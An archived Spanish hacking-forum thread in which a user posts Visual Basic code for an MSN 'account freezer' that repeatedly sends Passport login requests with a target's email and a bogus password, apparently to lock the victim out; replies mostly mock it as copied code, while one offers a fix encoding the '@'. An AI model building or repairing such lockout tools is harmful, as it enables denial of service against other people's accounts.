elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Compilacion de Congelador MSN.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Compilacion de Congelador MSN.  (Leído 8,772 veces)
g4bsk0r

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Compilacion de Congelador MSN.
« en: 14 Enero 2009, 17:08 pm »

Hola amigos de elhacker.net, queria saludarles y a la vez mostrarles mi aprendisaje.
Bueno este codigo fuente es:

Código
  1. Public Class Form1
  2.    Private Sub Command1_Click()
  3.    On Error Resume Next
  4.    Winsock1.Connect("login.passport.com", 80)
  5.    Timer1.Enabled = True
  6.    End Sub
  7.  
  8.  
  9.    Private Sub Timer1_Timer()
  10.    On Error Resume Next
  11.    Winsock1.SendData("GET /login2.srf HTTP/1.0" & vbCrLf)
  12.    Winsock1.SendData("Accept: */*" & vbCrLf)
  13.    Winsock1.SendData("Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=" + Text1.Text + ",pwd=FREEZED-BY-WHK,lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849cb7" & vbCrLf)
  14.    Winsock1.SendData(vbCrLf)
  15.    Winsock1.SendData(vbCrLf)
  16.    End Sub
  17.  
  18.  
  19.    Private Sub Command2_Click()
  20.    On Error Resume Next
  21.    Timer1.Enabled = False
  22.    Winsock1.Close()
  23.    End Sub

El caso es que en este experimento que estado haciendo sobre los congeladores del msn queria que calificaceis mi avance, y que me ayudaran a encontrar donde esa el problema de este codigo.

Saludos y  muchas gracias por la atencion !


En línea

skapunky
Electronik Engineer &
Colaborador
***
Desconectado Desconectado

Mensajes: 3.667


www.killtrojan.net


Ver Perfil WWW
Re: Compilacion de Congelador MSN.
« Respuesta #1 en: 14 Enero 2009, 22:36 pm »

Este fragmento de TU codigo es curioso:

Citar
.....Text1.Text + ",pwd=FREEZED-BY-WHK,lc....

 :-X


En línea

Killtrojan Syslog v1.44: ENTRAR
ssccaann43 ©


Desconectado Desconectado

Mensajes: 792


¬¬


Ver Perfil
Re: Compilacion de Congelador MSN.
« Respuesta #2 en: 14 Enero 2009, 22:45 pm »

Este fragmento de TU codigo es curioso:

Citar
.....Text1.Text + ",pwd=FREEZED-BY-WHK,lc....

 :-X

Es exactamente ese mismo fragmento el que me huele a LAMMER
En línea

- Miguel Núñez
Todos tenemos derechos a ser estupidos, pero algunos abusan de ese privilegio...
"I like ^TiFa^"
[||HackerDark||]

Desconectado Desconectado

Mensajes: 87


Aprendiend C++ y OGRE


Ver Perfil
Re: Compilacion de Congelador MSN.
« Respuesta #3 en: 14 Enero 2009, 22:55 pm »

dios mio esto lammer no saben ni hacer un buen Copyboy  :xD
En línea

aaronduran2


Desconectado Desconectado

Mensajes: 790



Ver Perfil WWW
Re: Compilacion de Congelador MSN.
« Respuesta #4 en: 14 Enero 2009, 22:56 pm »

Jaja, que recuerdos con CopyBoy... :xD :xD :xD
En línea

ssccaann43 ©


Desconectado Desconectado

Mensajes: 792


¬¬


Ver Perfil
Re: Compilacion de Congelador MSN.
« Respuesta #5 en: 14 Enero 2009, 23:09 pm »

Jajaja.. Ese men debe estar traumado... Pero más le vale no seguir así...  :xD
En línea

- Miguel Núñez
Todos tenemos derechos a ser estupidos, pero algunos abusan de ese privilegio...
"I like ^TiFa^"
ricardovinzo

Desconectado Desconectado

Mensajes: 135


P.T.C


Ver Perfil
Re: Compilacion de Congelador MSN.
« Respuesta #6 en: 14 Enero 2009, 23:27 pm »

A parte de LAMMER y Copiado el code.. este TROZO de BASURA no SIRVE PARA NADA.. Aprende MSNP ( Messenger Protocol ) y hay posteas
En línea

3# Convocacion de Moderadores en Code Makers, entra!
Banti

Desconectado Desconectado

Mensajes: 225


NULL


Ver Perfil
Re: Compilacion de Congelador MSN.
« Respuesta #7 en: 14 Enero 2009, 23:46 pm »

Hola amigos de elhacker.net, queria saludarles y a la vez mostrarles mi aprendisaje.
Bueno este codigo fuente es:

Código
  1. Public Class Form1
  2.    Private Sub Command1_Click()
  3.    On Error Resume Next
  4.    Winsock1.Connect("login.passport.com", 80)
  5.    Timer1.Enabled = True
  6.    End Sub
  7.  
  8.  
  9.    Private Sub Timer1_Timer()
  10.    On Error Resume Next
  11.    Winsock1.SendData("GET /login2.srf HTTP/1.0" & vbCrLf)
  12.    Winsock1.SendData("Accept: */*" & vbCrLf)
  13.    Winsock1.SendData("Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=" + Text1.Text + ",pwd=FREEZED-BY-WHK,lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849cb7" & vbCrLf)
  14.    Winsock1.SendData(vbCrLf)
  15.    Winsock1.SendData(vbCrLf)
  16.    End Sub
  17.  
  18.  
  19.    Private Sub Command2_Click()
  20.    On Error Resume Next
  21.    Timer1.Enabled = False
  22.    Winsock1.Close()
  23.    End Sub

El caso es que en este experimento que estado haciendo sobre los congeladores del msn queria que calificaceis mi avance, y que me ayudaran a encontrar donde esa el problema de este codigo.

Saludos y  muchas gracias por la atencion !


Que aprendiste a hacer "copy and paste"...
El codigo es super re contra mega sencillo... para empeorar esta en visual basic que te ayuda todo cuando tenes un misero error.
En línea

seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: Compilacion de Congelador MSN.
« Respuesta #8 en: 15 Enero 2009, 01:19 am »

nooooooooooo...aparte el codigo es mezcla de visual basic .NET y visual basic 6.... :xD :xD que LAMMER....
En línea

m[a]rkus

Desconectado Desconectado

Mensajes: 64


Si juegas a ser hacker piensa como un hacker.


Ver Perfil WWW
Re: Compilacion de Congelador MSN.
« Respuesta #9 en: 14 Septiembre 2009, 21:22 pm »

Hola. Mira un error que vi yo es este:

Código:
Winsock1.SendData("Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=" + Text1.Text + ",pwd=FREEZED-BY-WHK,lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849cb7" & vbCrLf)

En donde pones
Citar
+ Text1.Text +
digamos que esta por ejemplo "pepe@hotmail.com" tienes que cambiar la "@" por  "%40" podrias hacerlo de esta manera:

Código:
& Replace(Text1.Text, "@", "%40") &

.....

Aprovechando la duda de Vaati pongo una mia:

Estoy intentando conectar a una cuenta MSN creando una especie de cliente muy basico y todo el funcionamiento me va bien hasta que tengo que conectar ah:

Citar
login.passport.com 443

Segun el tutorial.... dice que tengo que enviar esto:

Código:
Private Sub login_Connect()
    Monitor2.Text = Monitor2.Text & "Cliente > " & " Conectado con exito al tercer servidor:" & vbCrLf
    Text4.BackColor = vbGreen
    login.SendData "GET/ login2.srf HTTP/1.0"
    login.SendData "Accept: */* "
    login.SendData "Host: login.passport.com "
    login.SendData "User-Agent: GirL "
    login.SendData "Authorization: Passport1.0.4 "
    login.SendData "OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,signin=hack.markus%40hotmail.es,pwd=xx0n," & Dlogin
End Sub

Y conecta y envia esos datos pero... es somo si nada.. el servidor se queda a la escucha de otra cosa parece..

Si quereis que os pegue el codigo completo me decis.
En línea

Existen dos maneras de ser feliz en esta vida, una es hacerse el idiota y la otra serlo.

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
pregunto sobre el congelador o.o
Foro Libre
nightcode 4 2,240 Último mensaje 13 Octubre 2020, 21:02 pm
por Tachikomaia
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines